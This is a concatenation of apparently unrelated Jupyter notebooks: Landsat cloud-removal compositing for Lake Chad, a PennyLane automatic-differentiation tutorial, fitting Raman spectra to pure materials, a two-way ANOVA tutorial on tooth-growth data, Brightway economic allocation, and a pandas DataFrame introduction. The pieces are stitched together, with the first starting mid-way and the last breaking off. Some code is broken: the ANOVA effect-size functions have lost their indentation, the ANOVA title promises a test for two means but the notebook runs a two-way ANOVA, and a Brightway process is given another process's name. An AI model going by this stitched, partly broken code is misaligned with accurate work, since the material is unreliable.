The [next notebook](igarss_chad_03.ipynb) in the series deals with water classification on these cloud-free composites! We'll need to save our work so that it can be loaded in the next notebook. The good news is that xarrays closely resemble the structure of NetCDF files, so it makes sense to save them in that format. The code below saves these files as NetCDF using xarray's built-in export features.
```
## Let's drop pixel_qa since it doesn't make sense to house it in a composite.
final_post = clean_post.drop('pixel_qa')
final_pre = clean_pre.drop('pixel_qa')
final_post.to_netcdf('../demo/post_rain.nc')
final_pre.to_netcdf('../demo/pre_rain.nc')
```
The entire notebook has been condensed down to about two dozen lines of code below.
```
import datacube
import numpy as np
from datetime import datetime
from utils.data_cube_utilities.dc_mosaic import create_median_mosaic
def mosaic(dataset, mask):
    return create_median_mosaic(dataset, clean_mask = mask)
def cloud_and_slc_removal_mask(dataset):
    clear_pixels = dataset.pixel_qa.values == 2 + 64
    water_pixels = dataset.pixel_qa.values == 4 + 64
    a_clean_mask = np.logical_or(clear_pixels, water_pixels)
    return a_clean_mask
#datacube obj
dc = datacube.Datacube(app = "cloud_removal_in_chad", config = '/home/localuser/.datacube.conf')
#load params
latitude = (12.75, 13.0)
longitude = (14.25, 14.5)
time = (datetime(2015,1,1), datetime(2016,1,1))
platform = 'LANDSAT_7'
product = 'ls7_ledaps_lake_chad_full'
measurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']
#load
landsat_data = dc.load(latitude = latitude, longitude = longitude, time = time, product = product, platform = platform, measurements = measurements)
#time split params
start_of_rainy_season = '2015-06-01'
end_of_rainy_season = '2015-10-01'
start_of_year = '2015-01-01'
end_of_year = '2015-12-31'
#time split
pre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))
post = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))
#mask for mosaic process
mask_for_pre = cloud_and_slc_removal_mask(pre)
mask_for_post = cloud_and_slc_removal_mask(post)
#mosaic process
clean_pre = mosaic(pre, mask_for_pre)
clean_post = mosaic(post, mask_for_post)
#save file
clean_pre.drop('pixel_qa').to_netcdf('../demo/pre_01.nc')
clean_post.drop('pixel_qa').to_netcdf('../demo/post_01.nc')
```
<a href="https://colab.research.google.com/github/SaashaJoshi/pennylane-demo-cern/blob/main/1_classical_ml_with_automatic_differentiation.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
%%capture
# Comment this out if you don't want to install pennylane from this notebook
!pip install pennylane
# Comment this out if you don't want to install matplotlib from this notebook
!pip install matplotlib
```
# Training a machine learning model with automatic differentiation
In this tutorial we will:
* implement a toy version of a typical machine learning setup,
* understand how automatic differentiation allows us to compute gradients of the machine learning model, and
* use automatic differentiation to train the model.
First some imports...
```
import pennylane as qml
from pennylane import numpy as np # This will import a special, "differentiable" version of numpy.
import matplotlib.pyplot as plt
%matplotlib inline
np.random.seed(42)
np.array([0.1, -0.9]) # This is a tensor array with gradient
import numpy as vanilla_np
vanilla_np.array([0.1, -0.9])
x_axis = np.linspace(0, 6)
function_sin = np.sin(x_axis)
plt.plot(x_axis, function_sin)
# We can find the gradient of the above function too.
# In a vanilla numpy version, we cannot differentiate!
gradient_fnc = qml.grad(np.sin, argnum = 0)
g = [gradient_fnc(x) for x in x_axis]
plt.plot(x_axis, function_sin)
plt.plot(x_axis, g)
```
## 1. The three basic ingredients
A machine learning problem usually consists of *data*, a *model (family)* and a *cost function*:
<br />
<img src="https://github.com/XanaduAI/pennylane-demo-cern/blob/main/figures/data-model-cost.png?raw=1" width="500">
<br />
*Training* selects the best model from the family by minimising the cost on a training set of data samples. If we design the optimisation problem well, the trained model will also have a low cost on new sets of data samples that have not been used in training. This means that the model *generalises* well.
We will now create examples for each ingredient.
### Data
Let us create a two-dimensional toy dataset.
```
n_samples = 100
X0 = np.array([[np.random.normal(loc=-1, scale=1),
np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)])
X1 = np.array([[np.random.normal(loc=1, scale=1),
np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)])
X = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.
Y = np.concatenate([-np.ones(50), np.ones(50)], axis=0)
data = list(zip(X, Y))
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.show()
X.shape
```
### Model family
Next, we construct a linear model.
```
def model(x, w):
    return np.dot(x, w)
```
Let's try it out.
```
w = np.array([-0.5, -0.2])
model(X0[0], w)
# model(X0[1], w)
# If we put a threshold at zero (0), X0[0] would be classified in class +1 and X0[1] will be classified in class -1
```
We can plot the decision boundary: the line in data space where the model flips from a negative to a positive prediction.
```
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')
plt.show()
```
### Cost function
How good is the model on a single input-output training pair?
```
def loss(a, b):
    return (a - b)**2 # Square of the difference.
```
What is the average loss on a data set of multiple pairs?
```
def average_loss(w, data):
    c = 0
    for x, y in data:
        prediction = model(x, w)
        c += loss(prediction, y)
    return c/len(data)
w = np.array([1.3, -0.4])
average_loss(w, data)
```
## 2. Automatic computation of gradients
Because we imported PennyLane's numpy version, we can now compute gradients of the average loss with respect to the weights!
```
gradient_fn = qml.grad(average_loss, argnum=0)
gradient_fn(w, data)
```
We can use gradients to guess better candidates for parameters.
```
w_new = w - 0.05*gradient_fn(w, data)
average_loss(w_new, data)
```
This works because the gradient always points in the direction of steepest ascent in the cost landscape, so stepping against it decreases the cost.
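As a quick sanity check of that claim, the sketch below uses central finite differences in place of autodiff (the cost function and step size are illustrative):

```python
import numpy as np

def cost(w):
    # A simple bowl-shaped cost with its minimum at (1, -2).
    return (w[0] - 1) ** 2 + (w[1] + 2) ** 2

def num_grad(f, w, eps=1e-6):
    # Central finite differences, standing in for qml.grad here.
    g = np.zeros_like(w)
    for i in range(len(w)):
        e = np.zeros_like(w)
        e[i] = eps
        g[i] = (f(w + e) - f(w - e)) / (2 * eps)
    return g

w = np.array([0.0, 0.0])
w_new = w - 0.1 * num_grad(cost, w)
print(cost(w_new) < cost(w))  # stepping against the gradient lowers the cost
```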
```
# compute the gradient at some point in parameter space
some_w = np.array([-0.6, 0.5])
g = 0.01*gradient_fn(some_w, data)
# learning rate = 0.01 here above!
# make a contourplot of the cost
w1s = np.linspace(-2, 2)
w2s = np.linspace(-2, 2)
cost_grid = []
for w1 in w1s:
    for w2 in w2s:
        w = np.array([w1, w2])
        cost_grid.append(average_loss(w, data))
cost_grid = np.array(cost_grid).reshape((50, 50))
plt.contourf(w1s, w2s, cost_grid.T)
# plt.arrow takes displacements (dx, dy), so pass the scaled gradient directly
plt.arrow(some_w[0], some_w[1], g[0], g[1],
          head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.xlabel(r"$w_1$")
plt.ylabel(r"$w_2$")
plt.show()
```
## 3. Training with gradient descent
Putting it all together, we can train the linear model.
```
w_init = np.random.random(size=(2,))
w = np.array(w_init)
history = []
for i in range(15):
    w_new = w - 0.05*gradient_fn(w, data)
    print(average_loss(w_new, data))
    history.append(w_new)
    w = w_new
```
We can easily visualise the path that gradient descent took in parameter space.
```
plt.contourf(w1s, w2s, cost_grid.T)
history = np.array(history)
plt.plot(history[:, 0], history[:, 1], "-o")
plt.xlabel(r"$w_1$")
plt.ylabel(r"$w_2$")
plt.show()
```
Training hasn't fully converged yet, but the decision boundary is already better.
```
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')
plt.show()
```
# TASKS
1. Add a constant scalar bias term $b \in \mathbb{R}$ to the model,
$$ f(x, w) = \langle w, x \rangle + b, $$
and train both $w$ and $b$ at the same time.
2. Change the model to a neural network with a single hidden layer.
$$ f(x, w, W) = \langle w, \varphi(Wx) \rangle,$$
where $W$ is a weight matrix of suitable dimension and $\varphi$ a hand-coded nonlinear activation function.
Tip: You can use the vector-valued sigmoid function
```
def sigmoid(z):
    return 1/(1 + np.exp(-z))
```
3. Code up the above example using PyTorch.
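For Task 1, a minimal numpy-only sketch with hand-derived gradients standing in for `qml.grad` (all names and hyperparameters here are illustrative assumptions, not the tutorial's reference solution):

```python
import numpy as np

# Same synthetic two-class data as in the notebook, regenerated here.
rng = np.random.default_rng(42)
X = np.vstack([rng.normal([-1, 1], 1.0, (50, 2)),
               rng.normal([1, -1], 1.0, (50, 2))])
Y = np.concatenate([-np.ones(50), np.ones(50)])

w, b = np.zeros(2), 0.0
for _ in range(100):
    err = X @ w + b - Y
    # Gradients of the mean squared error with respect to w and b.
    w -= 0.05 * 2 * X.T @ err / len(Y)
    b -= 0.05 * 2 * err.mean()

print(round(float(np.mean((X @ w + b - Y) ** 2)), 3))
```

With autodiff, the loop body would instead call `qml.grad` on an `average_loss(params, data)` that unpacks `params = (w, b)`.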
```
n_samples = 100
X0 = np.array([[np.random.normal(loc=-1, scale=1),
np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)])
X1 = np.array([[np.random.normal(loc=1, scale=1),
np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)])
X = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.
Y = np.concatenate([-np.ones(50), np.ones(50)], axis=0)
data = list(zip(X, Y))
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.show()
samples = 100
# Class 1 (calling np.random.normal; the original stored the function object itself)
X_1 = np.array([[np.random.normal(loc=-1, scale=1),
                 np.random.normal(loc=1, scale=1)] for i in range(samples//2)])
# Class 2
X_2 = np.array([[np.random.normal(loc=1, scale=1),
                 np.random.normal(loc=-1, scale=1)] for i in range(samples//2)])
# Bias: one random offset per sample, broadcast over both features
bias = np.array([[np.random.normal()] for i in range(samples)])
X = np.concatenate([X_1, X_2], axis = 0)
X_data = np.add(X, bias)
Y_class_data = np.concatenate([-np.ones(50), np.ones(50)], axis = 0)
data = list(zip(X_data, Y_class_data))
print(X_data)
```
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
from functions import *
%matplotlib inline
```
To identify the materials that make up the clusters, we choose **not to fit every individual spectrum within a given cluster**; instead, **we average over all the spectra in each cluster and fit the result of that average.**
We therefore import the centroids of the clusters, which are returned automatically by the k-means algorithm used for the clustering.
## Importing the data
```
#import the cluster labels
labels=np.loadtxt("../data/processed/CLUSTERING_labels.txt")
# import the centroids
data = pd.read_csv("../data/processed/CLUSTERING_data_centres.csv")
data.drop(labels='Unnamed: 0',inplace=True,axis=1)
pure_material_names,pure_materials = import_pure_spectra('../data/raw/Database Raman/BANK_LIST.dat','../data/raw/Database Raman/')
```
## Interpolation
**The sampling frequencies of the pure spectra differ from one another and from those used to sample the experimental spectra.** Before fitting, we must first interpolate the pure spectra onto the sampling points of the experimental spectra. After interpolation, the pure spectra share the same frequencies as the experimental spectra.
```
pure_materials_interpoled=pd.DataFrame(data.wn.copy())
for temp in pure_material_names:
    pure_materials_interpoled = pure_materials_interpoled.join(pd.DataFrame(np.interp(data.wn, pure_materials[temp+'_wn'], pure_materials[temp+'_I']), columns=[temp]))
```
After interpolating the data, we normalize the pure spectra.
```
#Normalization
for i in pure_material_names:
    pure_materials_interpoled[i] = pure_materials_interpoled[i]/np.trapz(abs(pure_materials_interpoled[i].dropna()), x=pure_materials_interpoled.wn)
```
## Fit
To fit the pure spectra to the data, we reason as follows:
- the unknown centroid spectrum $C$ can be viewed as a linear combination, with non-negative coefficients, of all the pure spectra $P_{i}$;
- in our model the pure spectra $P_{i} \in \mathbb{R}^n$, where $n$ is the dimensionality of the intensity vector of each spectrum;
- $C = \sum \alpha_{i}P_{i} + P_{0}$, where $P_{0}$ is a constant offset.
Fortunately, a recent release of scikit-learn (published right around the time we were working on this project) introduced the `positive` parameter in `LinearRegression`, which restricts the fit to non-negative coefficients. This was essential: we would otherwise have had to implement the constraint ourselves, since without it the fit combined positive and negative coefficients across all the spectra and ended up fitting the noise.
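As a toy illustration of what `positive=True` does, the sketch below recovers known non-negative mixing coefficients from two synthetic "pure spectra" (nothing here comes from the project's real data):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

wn = np.linspace(0, 10, 200)                 # fake wavenumber axis
p1 = np.exp(-(wn - 3) ** 2)                  # synthetic "pure spectrum" 1
p2 = np.exp(-(wn - 7) ** 2)                  # synthetic "pure spectrum" 2
mixture = 0.3 * p1 + 0.7 * p2 + 0.1          # known combination plus a constant offset

ols = LinearRegression(positive=True)
ols.fit(np.column_stack([p1, p2]), mixture)
print(np.round(ols.coef_, 2), round(float(ols.intercept_), 2))
```

The fitted coefficients recover the mixing weights and the intercept recovers the constant offset, which is exactly the role $P_{0}$ plays above.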
```
ols=LinearRegression(positive=True) # define the regressor
```
For each cluster we then run a linear regression, extracting the coefficients and the intercept.
```
N_cluster=len(data.columns)-1
coeff=[]
intercept=[]
for i in range(N_cluster):
    ols.fit(pure_materials_interpoled[pure_material_names], data[str(i)]) # fit the (linear) model to the training data
    coeff.append(ols.coef_)
    intercept.append(ols.intercept_)
```
### Plotting each cluster centroid and its fit
```
fig, axs = plt.subplots(nrows = N_cluster, figsize = (16,38))
for i in range(N_cluster):
    axs[i].plot(data.wn, data[str(i)])
    axs[i].plot(pure_materials_interpoled.wn, intercept[i] + np.sum(pure_materials_interpoled[pure_material_names] * coeff[i], axis=1))
    axs[i].set_title('Cluster ' + str(i))
    axs[i].legend(['centroid', 'fit'], loc='upper right')
```
## Determining material abundance
Taking into account the number of spectra in each cluster, we determine the most abundant material in the sample from the fit coefficients. **This yields the final result: the abundances in the sample**.
```
#drop the all-zero cluster (if present) and normalize the coefficients of each cluster
for temp in np.unique(labels):
    if max(data[str(int(temp))])>1e-10:
        coeff[int(temp)]=coeff[int(temp)]/sum(coeff[int(temp)])
    else:
        print(f'Flat spectrum detected; cluster {int(temp)} not used')
        coeff[int(temp)]=np.zeros(len(coeff[int(temp)]))
#number of spectra per cluster, in order
weights=[np.count_nonzero(labels==i) for i in range(len(data.columns)-1)]
#multiply the coefficients of the i-th cluster by this number
abb_notnormalized=[coeff[i]*weights[i] for i in range(len(data.columns)-1)]
#and finally take the weighted average of the coefficients
abb=sum(abb_notnormalized)/(sum(abb_notnormalized).sum())
#create a pandas DataFrame with names and abundances
abb_table=pd.DataFrame({'names':pure_material_names,'abbundances':abb})
#sort by abundance
abb_table.sort_values('abbundances',ascending=False,inplace=True, ignore_index=True)
abb_table[abb_table['abbundances']>0.01]
abb_table.to_csv("../data/processed/abb_table.csv")
```
# Test for Two Means - ANOVA (Analysis of Variance)
Analysis of variance is the statistical technique used to evaluate claims about population means. Fundamentally, the analysis checks whether there is a significant difference between the means and whether the factors influence some dependent variable, given $k$ populations with unknown means $\mu_i$.
The basic assumptions of analysis of variance are:
- The samples are random and independent
- The populations are normally distributed (the test is parametric)
- The population variances are equal
In practice, these assumptions need not all be rigorously satisfied. The results hold empirically whenever the populations are approximately normal (that is, not too skewed) and have similar variances.
We want to test whether the $k$ means are equal; for this we will use the **ANOVA (Analysis of Variance)** table.
Variation in the data:
<br>
$$SQT = \sum_{i=1}^{k}\sum_{j=1}^{n_i} (x_{ij}- \overline x)^2 =
\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}^2 -
\frac{1}{n}\Big(\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}\Big)^2 $$
<br><br>
$$SQE = \sum_{i=1}^{k} n_i(\overline x_{i}- \overline x)^2 =
\sum_{i=1}^{k} \frac{1}{n_i}\Big (\sum_{j=1}^{n_i} x_{ij}\Big)^2 -
\frac{1}{n}\Big(\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}\Big)^2 $$
<br><br>
$$SQR = \sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}^2 -
\sum_{i=1}^{k} \frac{1}{n_i}\Big (\sum_{j=1}^{n_i} x_{ij}\Big)^2$$
<br><br>
It can be shown that:
$$SQT=SQE+SQR$$
where:
- SQT: total sum of squares (Soma dos Quadrados Total)
- SQE: explained sum of squares (Soma dos Quadrados Explicada)
- SQR: residual sum of squares (Soma dos Quadrados dos Resíduos)
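A quick numeric check of the identity $SQT = SQE + SQR$ on a tiny made-up dataset:

```python
import numpy as np

# Three illustrative groups of observations (values chosen arbitrarily).
groups = [np.array([5., 6., 7.]),
          np.array([8., 9., 10.]),
          np.array([1., 2., 3.])]
all_x = np.concatenate(groups)
grand_mean = all_x.mean()

sqt = np.sum((all_x - grand_mean) ** 2)                            # total
sqe = sum(len(g) * (g.mean() - grand_mean) ** 2 for g in groups)   # between groups
sqr = sum(np.sum((g - g.mean()) ** 2) for g in groups)             # within groups
print(sqt, sqe + sqr)  # the two quantities agree
```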
<br><br>
<img src="img/anova.png" width="450" />
<br><br>
Under the assumptions of random and independent variables, ideally each variable in a model explains a distinct part of the dependent variable. We can therefore picture the desired *fit* as variables that are independent of one another, as illustrated in the figure below.
<br><br>
<img src="img/anova_explicada.png" width="350" />
<br><br>
# Example: tooth growth dataset with two different therapies
The dataset records tooth growth in animals given two alternative therapies. The response is the length of odontoblasts (the cells responsible for tooth growth) in 60 guinea pigs. Each animal received one of three dose levels of vitamin C (0.5, 1, and 2 mg/day) by one of two delivery methods: orange juice (coded "OJ") or ascorbic acid, a form of vitamin C (coded "VC").
An important advantage of two-way ANOVA is that it is more efficient than one-way ANOVA. There are two assignable sources of variation (supp and dose in our example), and this helps reduce the error variance, making the design more efficient. Two-way (factorial) ANOVA can be used, for example, to compare the means of populations that differ in two ways, or to analyze the mean responses in an experiment with two factors. Unlike one-way ANOVA, it lets us test the effect of two factors at the same time. One can also test the independence of the factors, provided there is more than one observation in each cell. The only restriction is that the number of observations in each cell must be equal (there is no such restriction for one-way ANOVA).
We discussed linear models earlier, and ANOVA is in fact a type of linear model; the difference is that ANOVA applies when you have discrete factors whose effect on a continuous outcome variable you want to understand.
## Importing the libraries
```
import pandas as pd
import statsmodels.api as sm
from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm
from statsmodels.graphics.factorplots import interaction_plot
import matplotlib.pyplot as plt
from scipy import stats
```
## Importing the data
```
datafile = "../../99 Datasets/ToothGrowth.csv.zip"
data = pd.read_csv(datafile)
data.head()
data.info()
data.describe()
fig = interaction_plot(data.dose, data.supp, data.len,
colors=['red','blue'], markers=['D','^'], ms=10)
```
## Calculating the sums of squares
<br>
<img src="img/SS.png">
<br>
```
# Degrees of freedom
N = len(data.len)
df_a = len(data.supp.unique()) - 1
df_b = len(data.dose.unique()) - 1
df_axb = df_a*df_b
df_w = N - (len(data.supp.unique())*len(data.dose.unique()))
grand_mean = data['len'].mean()
# SS for factor A
ssq_a = sum([(data[data.supp ==l].len.mean()-grand_mean)**2 for l in data.supp])
# SS for factor B
ssq_b = sum([(data[data.dose ==l].len.mean()-grand_mean)**2 for l in data.dose])
# SS total
ssq_t = sum((data.len - grand_mean)**2)
## Residual (within-group) SS
vc = data[data.supp == 'VC']
oj = data[data.supp == 'OJ']
vc_dose_means = [vc[vc.dose == d].len.mean() for d in vc.dose]
oj_dose_means = [oj[oj.dose == d].len.mean() for d in oj.dose]
ssq_w = sum((oj.len - oj_dose_means)**2) +sum((vc.len - vc_dose_means)**2)
# SS for the AxB interaction
ssq_axb = ssq_t-ssq_a-ssq_b-ssq_w
```
## Mean squares
```
# MS for A
ms_a = ssq_a/df_a
# MS for B
ms_b = ssq_b/df_b
# MS for AxB
ms_axb = ssq_axb/df_axb
# MS for the residual
ms_w = ssq_w/df_w
```
## F-Score
```
# F-score for A
f_a = ms_a/ms_w
# F-score for B
f_b = ms_b/ms_w
# F-score for the AxB interaction
f_axb = ms_axb/ms_w
```
## p-Value
```
# p-value for A
p_a = stats.f.sf(f_a, df_a, df_w)
# p-value for B
p_b = stats.f.sf(f_b, df_b, df_w)
# p-value for the AxB interaction
p_axb = stats.f.sf(f_axb, df_axb, df_w)
```
## Resultados
```
# Collecting the results in a DataFrame
results = {'sum_sq':[ssq_a, ssq_b, ssq_axb, ssq_w],
'df':[df_a, df_b, df_axb, df_w],
'F':[f_a, f_b, f_axb, 'NaN'],
'PR(>F)':[p_a, p_b, p_axb, 'NaN']}
columns=['sum_sq', 'df', 'F', 'PR(>F)']
aov_table1 = pd.DataFrame(results, columns=columns,
index=['supp', 'dose',
'supp:dose', 'Residual'])
# Computing eta-squared and omega-squared, and printing the table
def eta_squared(aov):
aov['eta_sq'] = 'NaN'
aov['eta_sq'] = aov[:-1]['sum_sq']/sum(aov['sum_sq'])
return aov
def omega_squared(aov):
mse = aov['sum_sq'][-1]/aov['df'][-1]
aov['omega_sq'] = 'NaN'
aov['omega_sq'] = (aov[:-1]['sum_sq']-(aov[:-1]['df']*mse))/(sum(aov['sum_sq'])+mse)
return aov
eta_squared(aov_table1)
omega_squared(aov_table1)
print(aov_table1)
```
### Comments
The dose variable shows the largest deviation from the grand mean (sum_sq) and therefore the largest relative variance (F-score). This is confirmed by the eta-squared and omega-squared values (defined below).
### More on eta-squared and omega-squared
Another set of effect-size measures for categorical independent variables has a more intuitive interpretation and is easier to evaluate. These include eta-squared, partial eta-squared, and omega-squared. Like the R-squared statistic, they all carry the intuitive interpretation of the proportion of variance accounted for.
Eta-squared is computed in the same way as R-squared and has the most nearly equivalent interpretation: of the total variation in Y, the proportion that can be attributed to a specific X.
Eta-squared, however, is used specifically in ANOVA models. Each categorical effect in the model has its own eta-squared, giving a specific, intuitive measure of that variable's effect.
The drawback of eta-squared is that it is a biased measure of the population variance explained (although it is exact for the sample): it always overestimates it.
This bias becomes very small as the sample size grows, but for small samples an unbiased effect-size measure is omega-squared. Omega-squared has the same basic interpretation but uses unbiased estimates of the variance components. Because it is an unbiased estimate of the population variances, omega-squared is always smaller than eta-squared.
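In symbols, the two effect sizes computed by the `eta_squared` and `omega_squared` helpers above are:

$$\eta^2_{\text{effect}} = \frac{SS_{\text{effect}}}{SS_{\text{total}}}, \qquad \omega^2_{\text{effect}} = \frac{SS_{\text{effect}} - df_{\text{effect}}\,MS_{\text{error}}}{SS_{\text{total}} + MS_{\text{error}}}$$

where $MS_{\text{error}} = SS_{\text{residual}} / df_{\text{residual}}$.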
There are no agreed standards for how to interpret an effect size (ES); the interpretation is largely subjective. The best approach is to compare it with other studies.
Cohen (1977):
- 0.2 = small
- 0.5 = moderate
- 0.8 = large
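These cut-offs can be wrapped in a tiny helper for labeling the values printed in the table above; the "negligible" label for values under 0.2 is my own addition, not part of Cohen's scale:

```python
def cohen_label(es):
    """Map an effect size to Cohen's (1977) rough labels."""
    if es >= 0.8:
        return "large"
    if es >= 0.5:
        return "moderate"
    if es >= 0.2:
        return "small"
    return "negligible"  # below Cohen's smallest threshold

print(cohen_label(0.59))  # prints: moderate
```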
## ANOVA with Statsmodels
```
formula = 'len ~ C(supp) + C(dose) + C(supp):C(dose)'
model = ols(formula, data).fit()
aov_table = anova_lm(model, typ=2)
eta_squared(aov_table)
omega_squared(aov_table)
print(aov_table)
```
## Quantile-Quantile (QQ plot)
```
res = model.resid
fig = sm.qqplot(res, line='s')
plt.show()
```
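The QQ plot is a visual check that the residuals are roughly normal; a numerical companion is the Shapiro-Wilk test, which could be applied to `model.resid`. A self-contained sketch on simulated residuals (the data here is synthetic, not the ToothGrowth residuals):

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
residuals = rng.normal(loc=0.0, scale=3.0, size=60)  # stand-in for model.resid

stat, p = stats.shapiro(residuals)
print(stat, p)  # a large p-value gives no evidence against normality
```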
|
github_jupyter
|
# Import development libraries
```
import bw2data as bd
import bw2calc as bc
import bw_processing as bwp
import numpy as np
import matrix_utils as mu
```
# Create new project
```
bd.projects.set_current("Multifunctionality")
```
Our existing implementation allows us to distinguish activities and products, though not everyone does this.
```
db = bd.Database("background")
db.write({
("background", "1"): {
"type": "process",
"name": "1",
"exchanges": [{
"input": ("background", "bio"),
"amount": 1,
"type": "biosphere",
}]
},
("background", "2"): {
"type": "process",
"name": "2",
"exchanges": [{
"input": ("background", "bio"),
"amount": 10,
"type": "biosphere",
}]
},
("background", "bio"): {
"type": "biosphere",
"name": "bio",
"exchanges": [],
},
("background", "3"): {
"type": "process",
"name": "2",
"exchanges": [
{
"input": ("background", "1"),
"amount": 2,
"type": "technosphere",
}, {
"input": ("background", "2"),
"amount": 4,
"type": "technosphere",
}, {
"input": ("background", "4"),
"amount": 1,
"type": "production",
}
]
},
("background", "4"): {
"type": "product",
}
})
method = bd.Method(("something",))
method.write([(("background", "bio"), 1)])
```
# LCA of background system
This database is fine and normal. It works the way we expect.
Here we use the preferred calling convention for Brightway 2.5, with the convenience function `prepare_lca_inputs`.
```
fu, data_objs, _ = bd.prepare_lca_inputs(demand={("background", "4"): 1}, method=("something",))
lca = bc.LCA(fu, data_objs=data_objs)
lca.lci()
lca.lcia()
lca.score
```
# Multifunctional activities
What happens when we have an activity that produces multiple products?
```
db = bd.Database("example mf")
db.write({
# Activity
("example mf", "1"): {
"type": "process",
"name": "mf 1",
"exchanges": [
{
"input": ("example mf", "2"),
"amount": 2,
"type": "production",
}, {
"input": ("example mf", "3"),
"amount": 4,
"type": "production",
},
{
"input": ("background", "1"),
"amount": 2,
"type": "technosphere",
}, {
"input": ("background", "2"),
"amount": 4,
"type": "technosphere",
}
]
},
# Product
("example mf", "2"): {
"type": "good",
"price": 4
},
# Product
("example mf", "3"): {
"type": "good",
"price": 6
}
})
```
We can do an LCA of one of the products, but we will get a warning about a non-square matrix:
```
fu, data_objs, _ = bd.prepare_lca_inputs(demand={("example mf", "1"): 1}, method=("something",))
lca = bc.LCA(fu, data_objs=data_objs)
lca.lci()
```
If we look at the technosphere matrix, we can see our background database (upper left quadrant), and the two production exchanges in the lower right:
```
lca.technosphere_matrix.toarray()
```
# Handling multifunctionality
There are many ways to do this. This notebook is an illustration of how such approaches can be made easier using the helper libraries [bw_processing](https://github.com/brightway-lca/bw_processing) and [matrix_utils](https://github.com/brightway-lca/matrix_utils), not a statement that one approach is better (or even correct).
We create a new, in-memory "delta" `bw_processing` data package that gives new values for some additional columns in the matrix (the virtual activities generated by allocating each product), as well as updating values in the existing matrix.
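Before the implementation, here is the arithmetic behind economic allocation for the two co-products defined above (production amounts 2 and 4, prices 4 and 6); this is plain Python, independent of Brightway:

```python
# (amount, price) for the two co-products of ("example mf", "1")
products = {"2": (2, 4), "3": (4, 6)}

# Each product's share of the activity's total economic value
total_value = sum(amount * price for amount, price in products.values())
factors = {key: amount * price / total_value
           for key, (amount, price) in products.items()}

print(total_value, factors)  # 32 {'2': 0.25, '3': 0.75}
```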
```
def economic_allocation(dataset):
assert isinstance(dataset, bd.backends.Activity)
# Split exchanges into functional and non-functional
functions = [exc for exc in dataset.exchanges() if exc.input.get('type') in {'good', 'waste'}]
others = [exc for exc in dataset.exchanges() if exc.input.get('type') not in {'good', 'waste'}]
for exc in functions:
assert exc.input.get("price") is not None
total_value = sum([exc.input['price'] * exc['amount'] for exc in functions])
# Plus one because need to add (missing) production exchanges
n = len(functions) * (len(others) + 1) + 1
data = np.zeros(n)
indices = np.zeros(n, dtype=bwp.INDICES_DTYPE)
flip = np.zeros(n, dtype=bool)
for i, f in enumerate(functions):
allocation_factor = f['amount'] * f.input['price'] / total_value
col = bd.get_id(f.input)
# Add explicit production
data[i * (len(others) + 1)] = f['amount']
indices[i * (len(others) + 1)] = (col, col)
for j, o in enumerate(others):
index = i * (len(others) + 1) + j + 1
data[index] = o['amount'] * allocation_factor
flip[index] = o['type'] in {'technosphere', 'generic consumption'}
indices[index] = (bd.get_id(o.input), col)
# Add implicit production of allocated dataset
data[-1] = 1
indices[-1] = (dataset.id, dataset.id)
# Note: This assumes everything is in technosphere, a real function would also
# patch the biosphere
allocated = bwp.create_datapackage(sum_intra_duplicates=True, sum_inter_duplicates=False)
allocated.add_persistent_vector(
matrix="technosphere_matrix",
indices_array=indices,
flip_array=flip,
data_array=data,
name=f"Allocated version of {dataset}",
)
return allocated
dp = economic_allocation(bd.get_activity(("example mf", "1")))
lca = bc.LCA({bd.get_id(("example mf", "2")): 1}, data_objs=data_objs + [dp])
lca.lci()
```
Note that the last two columns, when summed together, form the unallocated activity (column 4):
```
lca.technosphere_matrix.toarray()
```
To make sure what we have done is clear, we can create the matrix just for the "delta" data package:
```
mu.MappedMatrix(packages=[dp], matrix="technosphere_matrix").matrix.toarray()
```
And we can now do LCAs of both allocated products:
```
lca.lcia()
lca.score
lca = bc.LCA({bd.get_id(("example mf", "3")): 1}, data_objs=data_objs + [dp])
lca.lci()
lca.lcia()
lca.score
```
|
github_jupyter
|
___
<a href='http://www.pieriandata.com'><img src='../Pierian_Data_Logo.png'/></a>
___
<center><em>Copyright Pierian Data</em></center>
<center><em>For more information, visit us at <a href='http://www.pieriandata.com'>www.pieriandata.com</a></em></center>
# DataFrames
DataFrames are the workhorse of pandas and are directly inspired by the R programming language. We can think of a DataFrame as a bunch of Series objects put together to share the same index. Let's use pandas to explore this topic!
```
import pandas as pd
import numpy as np
from numpy.random import randint
columns= ['W', 'X', 'Y', 'Z'] # four columns
index= ['A', 'B', 'C', 'D', 'E'] # five rows
np.random.seed(42)
data = randint(-100,100,(5,4))
data
df = pd.DataFrame(data,index,columns)
df
```
# Selection and Indexing
Let's learn the various methods to grab data from a DataFrame
# COLUMNS
## Grab a single column
```
df['W']
```
## Grab multiple columns
```
# Pass a list of column names
df[['W','Z']]
```
### DataFrame Columns are just Series
```
type(df['W'])
```
### Creating a new column:
```
df['new'] = df['W'] + df['Y']
df
